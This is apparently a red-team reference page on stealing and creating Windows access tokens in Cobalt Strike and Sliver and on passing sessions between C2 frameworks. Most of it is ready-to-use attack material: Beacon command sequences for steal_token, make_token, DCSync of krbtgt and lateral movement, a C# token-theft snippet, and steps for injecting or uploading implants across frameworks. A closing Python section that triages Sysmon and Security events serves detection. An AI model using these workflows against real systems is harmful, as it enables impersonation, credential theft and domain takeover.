Token Operations & Session Passing
Managing Windows access tokens within C2 and passing sessions between frameworks. Tokens represent a user’s security context — stealing or creating them allows acting as another user without knowing their password.
Token Operations
Understanding Tokens
Every process and thread has an access token containing:
- User SID and group memberships
- Privileges (SeDebugPrivilege, SeImpersonatePrivilege, etc.)
- Integrity level (Low, Medium, High, SYSTEM)
Primary token — assigned to a process at creation. Impersonation token — temporary identity a thread can assume. Beacon uses impersonation tokens for most credential-based operations.
CS: Token Commands
steal_token
Duplicates the access token from a running process. The current Beacon thread impersonates that user for all subsequent actions.
# 1. List processes and find target user's process
beacon> ps
# 2. Steal their token
beacon> steal_token <PID>
# 3. Verify
beacon> getuid
# [*] You are DOMAIN\targetuser
# 4. Perform actions as that user
beacon> ls \\server\share
beacon> shell dir \\dc01\c$
# 5. Drop the impersonation token
beacon> rev2self
beacon> getuid
# [*] You are DOMAIN\originaluser
Important: steal_token requires the Beacon to have SeDebugPrivilege or sufficient access to open a handle to the target process. Elevated beacons (SYSTEM/admin) can steal from any process.
make_token
Creates a new logon session with explicit credentials. The token is a network logon (type 9) — it works for remote access (SMB, WinRM, LDAP) but does not change the local identity.
# Create token with plaintext credentials
beacon> make_token DOMAIN\user Password123!
# Verify — getuid still shows original user (local identity unchanged)
beacon> getuid
# [*] You are DOMAIN\originaluser
# But network access uses the new credentials
beacon> ls \\server\c$
# [*] Listing: \\server\c$ (as DOMAIN\user)
# Drop the token
beacon> rev2self
make_token is the cleanest way to use credentials — no process injection, no LSASS access. It only creates a new logon session.
getuid
Check current security context.
beacon> getuid
# [*] You are DOMAIN\user (shows current impersonated identity)
rev2self
Revert to the Beacon’s original token. Always use after steal_token or make_token.
beacon> rev2self
Token Store (CS 4.8+)
Manage multiple stolen tokens without re-stealing.
# Steal and store
beacon> token-store steal <PID>
# List stored tokens
beacon> token-store show
# Use a stored token by index
beacon> token-store use <index>
# Remove a stored token
beacon> token-store remove <index>
# Remove all
beacon> token-store remove-all
Sliver: Token Operations
# Impersonate — steal token from PID
sliver> impersonate -p <PID>
# Make token (logon type 9)
sliver> make-token -u <user> -d <domain> -p <password>
# Revert
sliver> rev2self
# Check current user
sliver> whoami
sliver> sa-whoami # detailed with privileges
# Get SYSTEM (from admin)
sliver> getsystem
Manual: Token Impersonation
// C# token theft via P/Invoke (requires SeDebugPrivilege to open other users' processes).
// Assumes the usual P/Invoke declarations for OpenProcess, OpenProcessToken, DuplicateTokenEx,
// ImpersonateLoggedOnUser and CloseHandle (kernel32/advapi32) and System.ComponentModel for Win32Exception.
IntPtr hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, pid);
if (hProcess == IntPtr.Zero) throw new Win32Exception();
if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, out IntPtr hToken)) throw new Win32Exception();
// Duplicate into a new primary token at SecurityImpersonation level so the copy outlives the source handle
if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out IntPtr newToken)) throw new Win32Exception();
if (!ImpersonateLoggedOnUser(newToken)) throw new Win32Exception();
// Current thread now runs as the stolen identity; RevertToSelf() drops it (this is what rev2self does)
CloseHandle(hToken);
CloseHandle(hProcess);
Common Token Workflows
Access a File Share as Another User
beacon> make_token DOMAIN\fileadmin Password123!
beacon> ls \\fileserver\sensitive$
beacon> download \\fileserver\sensitive$\data.xlsx
beacon> rev2self
Lateral Movement with Stolen Token
beacon> steal_token <PID> # steal DA token
beacon> jump winrm64 dc01 smb
beacon> rev2self
DCSync with Token
beacon> steal_token <PID> # steal DA or replication rights user
beacon> dcsync DOMAIN\krbtgt
beacon> rev2self
Session Passing
CS → CS (Spawn)
Spawn a new Beacon linked to a different listener.
# Spawn a new Beacon using a different listener (e.g. switch from HTTP to SMB)
beacon> spawn x64 smb-listener
# Spawn as another user
beacon> spawnas DOMAIN\user Password123! http-listener
CS → Metasploit (Foreign Listener)
Pass a Beacon session to Metasploit for modules not available in CS.
# 1. In Metasploit — start a handler
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_http
msf> set LHOST <msf_ip>
msf> set LPORT 8443
msf> exploit -j
# 2. In CS — create a Foreign HTTP listener
# Cobalt Strike > Listeners > Add
# Payload: Foreign HTTP
# Host: <msf_ip>
# Port: 8443
# 3. Spawn a session to the foreign listener
beacon> spawn x64 msf-http
Metasploit → CS
# 1. In CS — start an HTTP/HTTPS listener
# 2. Generate CS shellcode
# Attacks > Packages > Windows Executable (Stageless)
# Output: Raw (.bin)
# 3. In Metasploit — inject CS shellcode
msf> use post/windows/manage/shellcode_inject
msf> set SHELLCODE /path/to/beacon.bin
msf> set SESSION <meterpreter_session_id>
msf> run
CS → Sliver
# 1. In Sliver — generate a stageless implant
sliver> generate --mtls <sliver_ip> -s /tmp/sliver-implant.exe
# 2. From CS — upload and execute
beacon> cd C:\Users\Public
beacon> upload /tmp/sliver-implant.exe
beacon> run C:\Users\Public\sliver-implant.exe
# Or inject Sliver shellcode
# 1. Generate shellcode in Sliver
sliver> generate --mtls <sliver_ip> -f shellcode -s /tmp/sliver.bin
# 2. Inject in CS
beacon> shinject <PID> x64 /tmp/sliver.bin
Sliver → CS
# 1. Generate CS stageless shellcode (.bin)
# 2. From Sliver — inject
sliver> execute-shellcode -p <PID> /path/to/beacon.bin
Note
OPSEC summary:
- steal_token: opens a handle to the target process — Event 4656 / Sysmon Event 10
- make_token: creates a logon of type 9 — Event 4624 (but common in enterprise)
- rev2self: no detection surface — purely local operation
- Foreign listeners (CS → MSF): Meterpreter traffic has a different detection profile than Beacon
- Cross-framework injection: shellcode injection events (CreateRemoteThread) apply regardless of framework
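The OPSEC summary above names the events each technique leaves behind. The following is an added example (not part of the original notes) of a small triage pass over those event types, written from the defender's side: Sysmon Event 10 (ProcessAccess) and Security 4656 for the handle that steal_token needs, Security 4624 with logon type 9 for make_token, and Sysmon Event 8 (CreateRemoteThread) for cross-framework injection. The records are constructed to resemble the Sysmon and Security XML field names; every path, user and mask is invented, and KNOWN_PROCESS_ACCESSORS is an assumed allow-list a real deployment would tune from its own baseline. It also shows why getuid still reports the original user after make_token: the 4624 record keeps the original user as the subject and puts the supplied credentials in the TargetOutbound* fields.

```python
# Added example, not part of the original notes. Sample records are constructed;
# field names follow the Sysmon / Security schemas, values are invented.
from dataclasses import dataclass

PROCESS_QUERY_INFORMATION = 0x0400          # right the C# snippet above requests via OpenProcess
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # also sufficient to call OpenProcessToken
TOKEN_RIGHTS = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION

KNOWN_PROCESS_ACCESSORS = {  # assumption: images that routinely open other processes; tune per estate
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\lsass.exe",
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\System32\wininit.exe",
}


@dataclass
class Finding:
    rule: str
    detail: str


def _mask(value):
    """Access masks arrive as '0x1400'-style strings in Sysmon/Security XML."""
    return int(str(value), 16)


def triage_events(events):
    """Return one Finding per event matching a rule from the OPSEC summary, in input order."""
    findings = []
    for ev in events:
        src, eid = ev.get("Source"), ev.get("EventID")
        if src == "Sysmon" and eid == 10:
            # steal_token-style access: query rights on another process from an unexpected image
            access = _mask(ev["GrantedAccess"])
            if access & TOKEN_RIGHTS and ev["SourceImage"] not in KNOWN_PROCESS_ACCESSORS:
                findings.append(Finding("process-access",
                    f'{ev["SourceImage"]} opened {ev["TargetImage"]} with 0x{access:04x}'))
        elif src == "Security" and eid == 4656 and ev.get("ObjectType") == "Process":
            # same activity seen through object auditing instead of Sysmon
            access = _mask(ev["AccessMask"])
            if access & TOKEN_RIGHTS:
                findings.append(Finding("process-handle-request",
                    f'{ev["SubjectUserName"]} requested 0x{access:04x} on a Process object from {ev["ProcessName"]}'))
        elif src == "Security" and eid == 4624 and str(ev.get("LogonType")) == "9":
            # make_token: NewCredentials logon. Subject stays the original user (why getuid is
            # unchanged); the supplied credentials are recorded in TargetOutbound*.
            findings.append(Finding("newcredentials-logon",
                f'{ev["SubjectUserName"]} started a type-9 logon using '
                f'{ev["TargetOutboundDomainName"]}\\{ev["TargetOutboundUserName"]} from {ev["ProcessName"]}'))
        elif src == "Sysmon" and eid == 8:
            # cross-framework injection: CreateRemoteThread fires regardless of payload
            findings.append(Finding("remote-thread",
                f'{ev["SourceImage"]} created a thread in {ev["TargetImage"]}'))
    return findings


# Constructed sample records (invented paths, users and masks)
SAMPLE_EVENTS = [
    {"Source": "Sysmon", "EventID": 10, "SourceImage": r"C:\Users\Public\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1400"},
    {"Source": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1400"},
    {"Source": "Security", "EventID": 4656, "ObjectType": "Process", "AccessMask": "0x1400",
     "SubjectUserName": "alice", "ProcessName": r"C:\Users\Public\update.exe"},
    {"Source": "Security", "EventID": 4656, "ObjectType": "File", "AccessMask": "0x1400",
     "SubjectUserName": "alice", "ProcessName": r"C:\Windows\explorer.exe"},
    {"Source": "Security", "EventID": 4624, "LogonType": "9", "SubjectUserName": "alice",
     "TargetOutboundDomainName": "CORP", "TargetOutboundUserName": "svc-backup",
     "ProcessName": r"C:\Users\Public\update.exe"},
    {"Source": "Security", "EventID": 4624, "LogonType": "3", "SubjectUserName": "-",
     "TargetOutboundDomainName": "-", "TargetOutboundUserName": "-", "ProcessName": "-"},
    {"Source": "Sysmon", "EventID": 8, "SourceImage": r"C:\Users\Public\update.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Run against the constructed records, the pass flags the unexpected process access, the matching 4656 handle request, the type-9 logon (with the outbound account it carried) and the remote thread, while the svchost.exe access, the file-object 4656 and the type-3 logon fall through. The type-9 rule in particular is a low-confidence signal on its own, as the summary notes; in practice it is the combination with the requesting process and the outbound account that makes it worth a look.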
See also: b. User and Session Impersonation (PTH, Over-PTH, PTT), b. Process Injection (injection techniques), e. Credential Dumping (obtaining credentials for make_token)